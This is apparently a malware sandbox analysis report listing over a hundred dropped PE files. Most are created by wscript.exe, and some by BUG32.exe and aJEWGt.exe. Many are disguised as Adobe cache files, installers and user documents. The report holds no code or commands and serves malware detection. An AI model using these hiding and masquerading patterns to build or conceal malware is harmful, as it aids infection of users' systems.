    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\CURRENT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lstJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dbghelp.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOCKJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5622580005.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1033868256Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msedge_installer.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6213653276.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9655434068.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Desktop\DUUDTUBZFW.pngJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2168651637.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2669049752.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4965367024.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.logJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Favorites\Youtube.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wmsetup.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\EOWRVPQCCS.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Favorites\Google.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEIDJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\TQDFJHPUIU.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0653671941Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Favorites\Facebook.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\BJZFPPWAPT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Desktop\BJZFPPWAPT.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\symsrv.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0450125302Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome_installer.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOCKJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTargetJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\CURRENTJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sstJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\EFOYFBOLXA.docxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1141274626.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lstJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\DUUDTUBZFW.pngJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_3.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Links\Desktop.lnkJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\EOWRVPQCCS.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\EOWRVPQCCS.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5281104033.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\GRXZDKKVDB.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_RetentionJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\GIGIYTFFYT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4941266003.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct4B1.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lstJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcpJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\.curlrcJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8492240360.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\the-real-indexJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Favorites\Wikipedia.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2843307863.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9275373402.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2118371548.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Favorites\Amazon.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\prep_foundation_win32_bundle_V8_perf.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4676012234.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNKJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0450125302.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\_curlrc.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9659692161.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.jsonJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0518291756.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0164771190.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Favorites\Live.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3643399760.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jusched.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctFE34.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_SurfaceJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.oldJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\000003.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1287572840.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\CURRENT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8200946536.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8552718761.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\TQDFJHPUIU.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0196354653.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOCK.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies-journal.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3024948866.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1422339599.exeJump to dropped file
    Source: C:\Users\user\Desktop\BUG32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CB7D.tmp\BUG32\ad.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Color\ACECache11.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8182259827.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Favorites\Bing.urlJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6C7D10EA.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies-journalJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpresourceJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Desktop\EIVQSAOTAQ.jpgJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jones.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf8eae3dcaf681ca_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\GIGIYTFFYT.pngJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Favorites\Twitter.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Desktop\EOWRVPQCCS.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\BJZFPPWAPT.docxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2567238426.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\MANIFEST-000001.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\CZQKSDDMWR.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_SurfaceJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Documents\CZQKSDDMWR.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4478492829.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_2.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3476888679.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\prep_Form_JSI_API_not_a_real_file_V8_perf.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-indexJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\prep_privacy-sdx_win32_bundle_js_V8_perf.exeJump to dropped file
    Source: C:\Users\user\Desktop\BUG32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aJEWGt.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOCK.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\.curlrcJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.jsonJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1237160943.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.binJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7676687441.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0653671941.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Reporting and NEL-journal.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Desktop\BUG32.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\NetworkDataMigrated.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Desktop\PALRGUCVEH.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\000003.logJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2585558601.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\EIVQSAOTAQ.jpgJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Reporting and NEL.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOCK.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct42C5.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1206337459.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\_curlrc.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cv_debug.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Favorites\NYTimes.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\user-PC-20231004-1445.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct1834.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7847944919.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8886835349.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_BannerJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6092905029.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8975065801.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0196354653Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0518291756Jump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\Downloads\EOWRVPQCCS.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links.exeJump to dropped file
